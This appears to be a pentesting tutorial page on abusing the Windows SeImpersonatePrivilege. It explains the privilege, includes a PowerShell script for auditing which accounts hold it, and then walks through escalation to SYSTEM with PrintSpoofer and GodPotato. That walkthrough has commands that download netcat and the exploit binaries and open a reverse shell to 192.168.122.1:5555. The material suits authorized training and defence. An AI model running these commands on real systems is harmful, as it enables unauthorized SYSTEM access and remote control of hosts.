4 - SeImpersonatePrivilege Exploitation
What is SeImpersonatePrivilege?
The SeImpersonatePrivilege, or "Impersonate a client after authentication," is a user right in Windows that allows a process running on behalf of a user to impersonate another client once that client has authenticated.
This privilege is primarily used in client-server scenarios: it lets a server process impersonate the client process so it can perform tasks on the client's behalf.
Security Implications
If an attacker has the SeImpersonatePrivilege, they can:
Create a service to trick clients into connecting to it.
Impersonate the connected client's privileges, potentially escalating their own access to SYSTEM.
This makes SeImpersonatePrivilege a common target in privilege escalation attacks.
Checking for SeImpersonatePrivilege
To verify whether the current user has this privilege, run the following:
whoami /priv
Sample Output
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeImpersonatePrivilege Impersonate a client after authentication Enabled
If the SeImpersonatePrivilege is enabled, the user can exploit it for privilege escalation using tools like PrintSpoofer or GodPotato.
Assigning SeImpersonatePrivilege
If you want to assign the SeImpersonatePrivilege to a user:
Open the Local Group Policy Editor and navigate to:
Computer Configuration > Windows Settings > Security Settings > Local Policies > User Rights Assignment
Locate "Impersonate a client after authentication."
Right-click it, select Properties, then click Add User or Group.
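Besides checking your own token with whoami /priv, an administrator will want to know every principal on the host that holds this right, since each such account is a candidate for the escalation described on this page. The following PowerShell is an added example, not part of the original notes: it exports the local security policy with secedit, parses the SeImpersonatePrivilege line, resolves the SIDs, and flags any grantee beyond the Windows defaults (SERVICE, LOCAL SERVICE, NETWORK SERVICE, Administrators). It assumes an elevated session on Windows with secedit.exe available.

```powershell
# Added example (not the page's own code): audit which principals are granted
# SeImpersonatePrivilege via the local security policy. Requires an elevated session.
function Get-ImpersonatePrivilegeHolders {
    # Default holders of the right on a stock Windows install (well-known SIDs)
    $defaultSids = @('S-1-5-6', 'S-1-5-19', 'S-1-5-20', 'S-1-5-32-544')

    $inf = Join-Path $env:TEMP 'secpol-user-rights.inf'
    # Export only the User Rights Assignment area of the local policy
    secedit /export /cfg $inf /areas USER_RIGHTS /quiet | Out-Null

    # The export is a Unicode .inf; the relevant line looks like:
    #   SeImpersonatePrivilege = *S-1-5-6,*S-1-5-19,*S-1-5-20,*S-1-5-32-544
    $line = Get-Content -Path $inf | Where-Object { $_ -match '^SeImpersonatePrivilege\s*=' }
    Remove-Item -Path $inf -Force -ErrorAction SilentlyContinue

    if (-not $line) {
        Write-Warning 'No SeImpersonatePrivilege line found in the export (run elevated?)'
        return
    }

    $entries = (($line -split '=', 2)[1]).Trim() -split ','
    foreach ($entry in $entries) {
        $value = $entry.Trim()
        if (-not $value) { continue }
        if ($value.StartsWith('*')) {
            # A leading '*' marks a raw SID; translate it to an account name where possible
            $sidString = $value.Substring(1)
            try {
                $sid  = New-Object System.Security.Principal.SecurityIdentifier($sidString)
                $name = $sid.Translate([System.Security.Principal.NTAccount]).Value
            } catch { $name = '<unresolved>' }
        } else {
            # Entries without '*' are already account names
            $sidString = ''
            $name = $value
        }
        [PSCustomObject]@{
            Account   = $name
            SID       = $sidString
            IsDefault = ($sidString -in $defaultSids)
        }
    }
}

# Any row with IsDefault = False is a non-standard grantee worth reviewing
Get-ImpersonatePrivilegeHolders | Format-Table -AutoSize
```

Service accounts such as IIS application pool identities inherit the right through the SERVICE SID (S-1-5-6), so a default-looking list does not mean no service on the host can reach this escalation path.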
Privilege Escalation with SeImpersonatePrivilege
Initial Setup
Start a Listener on the Attacker Machine
nc -lvnp 5555
Download Netcat on the Victim Machine
iwr -uri "https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe" -Outfile nc64.exe
Exploiting with PrintSpoofer
PrintSpoofer leverages misconfigured print spooler services to escalate privileges to SYSTEM.
Download the Exploit
iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" -Outfile PrintSpoofer64.exe
Execute the Exploit
Run the following command to establish a SYSTEM shell:
PrintSpoofer64.exe -c "C:\Users\leonardo\Desktop\nc64.exe 192.168.122.1 5555 -e cmd"
Exploiting with GodPotato
GodPotato is a tool that exploits COM and DCOM misconfigurations to achieve SYSTEM privileges.
Identify .NET Framework Version
Use the following command to determine the .NET version installed:
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
Download the Appropriate GodPotato Version
Depending on the .NET version:
.NET 2.0:
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe" -Outfile GodPotato-NET2.exe
.NET 3.5:
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe" -Outfile GodPotato-NET35.exe
.NET 4.0:
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe" -Outfile GodPotato-NET4.exe
Execute the Exploit
Use the appropriate executable to escalate privileges and spawn a reverse shell:
.\GodPotato-NET2.exe -cmd "C:\Users\leonardo\Desktop\nc64.exe 192.168.122.1 5555 -e cmd"
Other Resources
Disclaimer
❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!❗